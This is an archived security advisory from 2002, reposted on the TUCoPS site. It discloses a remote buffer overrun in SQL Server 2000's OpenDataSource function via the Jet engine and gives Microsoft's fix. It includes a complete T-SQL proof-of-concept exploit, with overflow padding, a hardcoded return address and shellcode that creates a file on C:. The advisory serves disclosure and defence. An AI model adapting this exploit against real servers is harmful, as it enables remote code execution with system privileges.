Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5470.htm

SQL server remote exploit via OpenDataSource function overflow



20th Jun 2002 [SBWID-5470]
COMMAND

	SQL server remote exploit via OpenDataSource function overflow

SYSTEMS AFFECTED

	SQL server 2000, Windows 2000 SP 2

PROBLEM

	In  Mark  Litchfield   [mark@ngssoftware.com]   and   David   Litchfield
	[david@ngssoftware.com] NGSSoftware insight security  research  advisory
	[http://www.ngssoftware.com/vna/ms-sql.txt] [#NISR19062002] :
	

	Microsoft\'s database server SQL Server 2000 has a remotely  exploitable
	buffer  overrun  vulnerability  in  the  OpenDataSource  function   when
	combined with the MS Jet Engine. Due to this being a JET  problem  other
	products may also be  vulnerable;  however  the  fix  for  all  products
	should be the same.
	

	By making  a  specially  crafted  SQL  query  using  the  OpenDataSource
	function it is possible to overflow a buffer in the SQL Server  process,
	gaining control of its execution remotely. If the SQL Server is  running
	with SYSTEM  privileges,  this  is  default  behaviour,  then  any  code
	supplied by the  attacker  in  an  exploit  of  the  overflow  will  run
	uninhibited. Whilst the overflow  is  UNICODE  in  nature,  as  will  be
	shown, it is still very easy to exploit.
	

	What must be stressed is that this may be  launched  via  a  web  server
	application if it is vulnerable to SQL  Injection  so  just  because  no
	direct access can be gained to the SQL Server  from  the  Internet  does
	not mean it is safe. All  customers  running  SQL  Server  should  check
	their patch level.
	

	

	 Exploit

	 =======

	

	This Transact SQL Script will create a file called \"SQL-ODSJET-BO\"  on
	the root of the C: drive
	

	-------8<---------
	

	-- Simple Proof of Concept

	-- Exploits a buffer overrun in OpenDataSource()

	--

	-- Demonstrates how to exploit a UNICODE overflow using T-SQL

	-- Calls CreateFile() creating a file called c:\\SQL-ODSJET-BO

	-- I\'m overwriting the saved return address with 0x42B0C9DC

	-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2

	-- The address holds a jmp esp instruction.

	--

	-- To protect against this overflow download the latest Jet Service

	-- pack from Microsoft - http://www.microsoft.com/

	--

	-- David Litchfield (david@ngssoftware.com)

	-- 19th June 2002

	

	

	

	declare @exploit nvarchar(4000)

	declare @padding nvarchar(2000)

	declare @saved_return_address nvarchar(20)

	declare @code nvarchar(1000)

	declare @pad nvarchar(16)

	declare @cnt int

	declare @more_pad nvarchar(100)

	

	select @cnt = 0

	select @padding = 0x41414141

	select @pad = 0x4141

	

	while @cnt < 1063

	begin

	  select @padding = @padding + @pad

	  select @cnt = @cnt + 1

	end

	

	-- overwrite the saved return address

	

	select @saved_return_address = 0xDCC9B042

	select @more_pad = 0x4343434344444444454545454646464647474747

	

	-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K

	Sp2

	-- change if running a different service pack

	

	select @code =

	0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0

	C05052B8876FE877FFD0CCCCCCCCCC

	select @exploit = N\'SELECT * FROM

	penDataSource( \'\'Microsoft.Jet.OLEDB.4.0\'\',\'\'Data Source=\"c:\\\'

	select @exploit = @exploit + @padding + @saved_return_address + @more_pad +

	@code

	select @exploit = @exploit + N\'\";User ID=Admin;Password=;Extended

	properties=Excel 5.0\'\')...xactions\'

	exec (@exploit)

	

	------->8---------

SOLUTION

	Microsoft recommend that customers should upgrade their version of  Jet.
	The latest version is available from here:
	

	http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.a

	sp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearc

	h%26ordinal%3D2%26redirect%3Dno

	

	

	Further good reading from NGSSoftware :
	

	http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf

	http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

	http://www.ngssoftware.com/papers/ntbufferoverflow.html

	http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf

	http://www.ngssoftware.com/papers/unicodebo.pdf

	http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH